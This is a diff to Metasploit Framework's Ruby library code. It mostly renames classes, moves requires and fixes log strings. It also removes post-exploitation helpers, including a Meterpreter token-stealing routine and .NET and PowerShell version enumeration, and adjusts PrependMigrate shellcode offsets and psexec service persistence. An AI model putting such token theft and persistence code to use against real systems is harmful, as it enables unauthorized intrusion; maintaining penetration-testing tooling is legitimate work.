      print_status "#{ip}:#{port} Rows Returned: #{resp.rows.size}" if verbose
      if resp.rows.size > 0
-        tbl = Rex::Text::Table.new(
+        tbl = Rex::Ui::Text::Table.new(
          'Indent' => 4,
          'Header' => "Query Text: '#{sql}'",
          'Columns' => resp.fields.map {|x| x.name}
@@ -586,7 +586,7 @@ module Msf
        vprint_status("Serving exploit to user #{cli.peerhost} with tag #{tag}")
        profile = browser_profile[tag]
        if profile.nil?
-          print_status("Browser visiting directly to the exploit URL is forbidden.")
+          print_status("Browsing visiting directly to the exploit URL is forbidden.")
          send_not_found(cli)
        elsif profile[:tried] && !datastore['Retries']
          print_status("Target #{cli.peerhost} with tag \"#{tag}\" wants to retry the module, not allowed.")
@@ -1,9 +1,5 @@
 # -*- coding: binary -*-
 require 'rex/proto/dcerpc/svcctl'
-require 'windows_error'
-require 'windows_error/win32'
-
-include WindowsError::Win32

 module Msf

@@ -17,7 +13,7 @@ module Msf

 module Exploit::Remote::SMB::Client::Psexec

-  include Msf::Exploit::Windows_Constants
+  include Rex::Constants::Windows
  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client::Authenticated

@@ -168,7 +164,7 @@ module Exploit::Remote::SMB::Client::Psexec
          if service_exists
            print_warning("Not removing service as it already existed...")
          elsif datastore['SERVICE_PERSIST']
-            print_warning("Not removing service for persistence...")
+            print_warning("Not removing service for persistance...")
          else
            vprint_status("Removing the service...")
            svc_status = svc_client.deleteservice(svc_handle)
@@ -1,6 +1,5 @@
 module Msf
  module Exploit::Remote::SSH
-    require 'rex/socket/ssh_factory'
    def ssh_socket_factory
      Rex::Socket::SSHFactory.new(framework, self, datastore['Proxies'])
    end
@@ -164,7 +164,7 @@ module Exploit::Remote::WinRM
      rows << row_data
    end
    columns.uniq!
-    response_data = Rex::Text::Table.new(
+    response_data = Rex::Ui::Text::Table.new(
      'Header'    => "#{datastore['WQL']} (#{rhost})",
      'Indent'    => 1,
      'Columns'   => columns
@@ -3,7 +3,7 @@ require 'rex/io/stream_abstraction'
 require 'rex/sync/ref'
 require 'rex/payloads/meterpreter/uri_checksum'
 require 'rex/post/meterpreter'
-require 'rex/socket/x509_certificate'
+require 'rex/parser/x509_certificate'
 require 'msf/core/payload/windows/verify_ssl'
 require 'rex/user_agent'

@@ -409,10 +409,6 @@ class Msf::Module::Platform
      Rank = 700
      Alias = "10"
    end
-    class V11
-      Rank = 800
-      Alias = "11"
-    end
  end

  #
@@ -141,17 +141,6 @@ module Msf::Payload::Apk
      raise RuntimeError, "apktool version #{apk_v} not supported, please download at least version 2.0.1."
    end

-    unless File.readable?(File.expand_path("~/.android/debug.keystore"))
-      android_dir = File.expand_path("~/.android/")
-      unless File.directory?(android_dir)
-        FileUtils::mkdir_p android_dir
-      end
-      print_status "Creating android debug keystore...\n"
-      run_cmd("keytool -genkey -v -keystore ~/.android/debug.keystore \
-      -alias androiddebugkey -storepass android -keypass android -keyalg RSA \
-      -keysize 2048 -validity 10000 -dname 'CN=Android Debug,O=Android,C=US'")
-    end
-
    #Create temporary directory where work will be done
    tempdir = Dir.mktmpdir

@@ -2,6 +2,7 @@

 require 'msf/core'
 require 'msf/core/module/platform'
+require 'rex/constants'
 require 'rex/text'

 #
@@ -461,9 +461,9 @@ module Msf::Payload::Windows::PrependMigrate

      ; create the process
      push 0                    ; keep the stack aligned
-      lea rdi,[rsp+0x120]       ; Offset of empty space for lpProcessInformation
+      lea rdi,[rsp+0x110]       ; Offset of empty space for lpProcessInformation
      push rdi                  ; lpProcessInformation : write processinfo here
-      lea rcx,[rsp+0x60]
+      lea rcx,[rsp+0x58]
      push rcx                  ; lpStartupInfo : current info (read)
      xor rcx,rcx
      push rcx                  ; lpCurrentDirectory
@@ -1,7 +1,7 @@
 # -*- coding: binary -*-

 require 'msf/core'
-require 'rex/socket/x509_certificate'
+require 'rex/parser/x509_certificate'

 module Msf

@@ -25,7 +25,7 @@ module Payload::Windows::VerifySsl
      raise ArgumentError, "Verifying SSL cert is enabled but no handler cert is configured"
    end

-    hash = Rex::Socket::X509Certificate.get_cert_file_hash(handler_cert)
+    hash = Rex::Parser::X509Certificate.get_cert_file_hash(handler_cert)
    print_status("Meterpreter will verify SSL Certificate with SHA1 hash #{hash.unpack("H*").first}")
    hash
  end
@@ -332,16 +332,11 @@ module Msf
        cli_print "Payload size: #{encoded_payload.length} bytes"
        gen_payload = format_payload(encoded_payload)
      end
-
      if gen_payload.nil?
        raise PayloadGeneratorError, 'The payload could not be generated, check options'
      elsif gen_payload.length > @space and not @smallest
        raise PayloadSpaceViolation, 'The payload exceeds the specified space'
      else
-        if format.to_s != 'raw'
-          cli_print "Final size of #{format} file: #{gen_payload.length} bytes"
-        end
-
        gen_payload
      end
    end
@@ -21,5 +21,4 @@ module Msf::Post::Windows
  require 'msf/core/post/windows/ldap'
  require 'msf/core/post/windows/reflective_dll_injection'
  require 'msf/core/post/windows/kiwi'
-  require 'msf/core/post/windows/dotnet'
 end
@@ -1,88 +0,0 @@
-# -*- coding: binary -*-
-require 'msf/core/post/common'
-require 'msf/core/post/windows/registry'
-
-module Msf::Post::Windows::Dotnet
-  include ::Msf::Post::Common
-  include ::Msf::Post::Windows::Registry
-
-  def initialize(info = {})
-    super
-  end
-  #
-  # Searches the subkey for the value 'Version' which contains the
-  # actual version, rather than the over-arching release
-  # An alternative would be to query for it, and catch the exception.
-  #
-  
-  def search_for_version(dotnet_subkey)
-    dotnet_version = nil
-    begin
-      subkeys = registry_enumvals(dotnet_subkey)
-    rescue Rex::Post::Meterpreter::RequestError => e
-      print_status("Encountered exception in search_for_version: #{e.class} #{e}")
-      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
-    end
-    unless subkeys.nil?
-      subkeys.each do |subkey|
-        if subkey == 'Version'
-          dotnet_version = registry_getvaldata(dotnet_subkey, subkey)
-          break
-        end
-      end
-    end
-    return dotnet_version
-  end
-
-  #
-  # Bruteforce search all subkeys in an over-arching release to
-  # locate the actual release version.
-  #
-  def get_versionception(dotnet_vkey)
-    exact_version = nil
-    begin
-      subkeys = registry_enumkeys(dotnet_vkey)
-    rescue Rex::Post::Meterpreter::RequestError => e
-      print_status("Encountered exception in get_versionception: #{e.class} #{e}")
-      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
-    end
-    unless subkeys.nil?
-      subkeys.each do |subkey|
-        exact_version = search_for_version(dotnet_vkey + '\\' + subkey)
-        unless exact_version.nil?
-          # if we find a version, stop looking
-          break
-        end
-      end
-    end
-    return exact_version
-  end
-  
-  #
-  # 'Public' function that returns a list of all .NET versions on
-  # a windows host
-  #
-  def get_dotnet_versions
-    ret_val = []
-    key = 'HKLM\\SOFTWARE\\Microsoft\NET Framework Setup\\NDP'
-    begin
-      dotnet_keys = registry_enumkeys(key)
-    rescue Rex::Post::Meterpreter::RequestError => e
-      print_status("Encountered exception in get_dotnet_version: #{e.class} #{e}")
-      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
-    end
-    unless dotnet_keys.nil?
-      dotnet_keys.each do |temp_key|
-        if temp_key[0] == 'v'
-          key = 'HKLM\\SOFTWARE\\Microsoft\NET Framework Setup\\NDP\\' + temp_key
-          dotnet_version = get_versionception(key)
-          unless dotnet_version.nil? 
-            ret_val << dotnet_version
-          end
-        end
-      end
-    end
-    return ret_val
-  end
-end
-
@@ -30,31 +30,6 @@ module Powershell
    return false
  end

-  #
-  # Returns the Powershell version
-  #
-  def get_powershell_version
-    return nil unless have_powershell?
-
-    process, pid, c = execute_script('$PSVersionTable.PSVersion')
-
-    o = ''
-
-    while (d = process.channel.read)
-      if d == ""
-        if (Time.now.to_i - start < time_out) && (o == '')
-          sleep 0.1
-        else
-          break
-        end
-      else
-        o << d
-      end
-    end
-
-    o.scan(/[\d \-]+/).last.split[0,2] * '.'
-  end
-
  #
  # Get/compare list of current PS processes - nested execution can spawn many children
  # doing checks before and after execution allows us to kill more children...
@@ -43,48 +43,6 @@ module Msf::Post::Windows::Priv
    end
  end

-  # Steals the current user's token.
-  # @see steal_token
-  def steal_current_user_token
-    steal_token(get_env('COMPUTERNAME'), get_env('USERNAME'))
-  end
-
-  #
-  # Steals a token for a user.
-  # @param String computer_name Computer name.
-  # @param String user_name To token to steal from. If not set, it will try to steal
-  #                        the current user's token.
-  # @return [boolean] TrueClass if successful, otherwise FalseClass.
-  # @example steal_token(get_env('COMPUTERNAME'), get_env('USERNAME'))
-  #
-  def steal_token(computer_name, user_name)
-    pid = nil
-
-    session.sys.process.processes.each do |p|
-      if p['user'] == "#{computer_name}\\#{user_name}"
-        pid = p['pid']
-      end
-    end
-
-    unless pid
-      vprint_error("No PID found for #{user_name}")
-      return false
-    end
-
-    vprint_status("Stealing token from PID #{pid} for #{user_name}")
-
-    begin
-      session.sys.config.steal_token(pid)
-    rescue Rex::Post::Meterpreter::RequestError => e
-      # It could raise an exception even when the token is successfully stolen,
-      # so we will just log the exception and move on.
-      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
-    end
-
-    true
-  end
-
-
  #
  # Returns true if in the administrator group
  #
@@ -423,7 +423,7 @@ class Db
    end

    # If we got here, we're searching.  Delete implies search
-    tbl = Rex::Text::Table.new(
+    tbl = Rex::Ui::Text::Table.new(
      {
        'Header'  => "Hosts",
        'Columns' => col_names,
@@ -650,7 +650,7 @@ class Db
    if col_search
      col_names = col_search
    end
-    tbl = Rex::Text::Table.new({
+    tbl = Rex::Ui::Text::Table.new({
        'Header'  => "Services",
        'Columns' => ['host'] + col_names,
      })
@@ -1029,7 +1029,7 @@ class Db
      'Columns' => cred_table_columns
    }

-    tbl = Rex::Text::Table.new(tbl_opts)
+    tbl = Rex::Ui::Text::Table.new(tbl_opts)

    ::ActiveRecord::Base.connection_pool.with_connection {
      query = Metasploit::Credential::Core.where( workspace_id: framework.db.workspace )
@@ -1341,7 +1341,7 @@ class Db
    end

    # Now display them
-    csv_table = Rex::Text::Table.new(
+    csv_table = Rex::Ui::Text::Table.new(
      'Header'  => 'Notes',
      'Indent'  => 1,
      'Columns' => ['Time', 'Host', 'Service', 'Port', 'Protocol', 'Type', 'Data']
@@ -1501,7 +1501,7 @@ class Db
      end
    end

-    tbl = Rex::Text::Table.new({
+    tbl = Rex::Ui::Text::Table.new({
        'Header'  => "Loot",
        'Columns' => [ 'host', 'service', 'type', 'name', 'content', 'info', 'path' ],
      })
@@ -9,7 +9,7 @@ module Console
 # Console table display wrapper that allows for stylized tables
 #
 ###
-class Table < Rex::Text::Table
+class Table < Rex::Ui::Text::Table

  #
  # Default table styles.
@@ -1,5 +1,4 @@
 # -*- coding: binary -*-
-require 'rex/ui/text/bidirectional_pipe'
 module Msf
 module Ui
 module Web
@@ -84,7 +83,7 @@ module Comm
  end

  def self.create_session_pipe(session)
-    pipe = Rex::Ui::BidirectionalPipe.new
+    pipe = Rex::IO::BidirectionalPipe.new

    @session_pipes[session.id] = pipe

@@ -1,5 +1,4 @@
 # -*- coding: binary -*-
-require 'rex/ui/text/bidirectional_pipe'
 module Msf
 module Ui
 module Web
@@ -19,7 +18,7 @@ class WebConsole
  attr_accessor :thread

  # Wrapper class in case we need to extend the pipe
-  class WebConsolePipe < Rex::Ui::Text::BidirectionalPipe
+  class WebConsolePipe < Rex::IO::BidirectionalPipe
    def prompting?
      false
    end
@@ -8,7 +8,7 @@ module Msf
 module Ui
 module Web

-require 'rex/ui/text/bidirectional_pipe'
+require 'rex/io/bidirectional_pipe'
 require 'msf/ui/web/console'


--- a/Show More
+++ b/Show More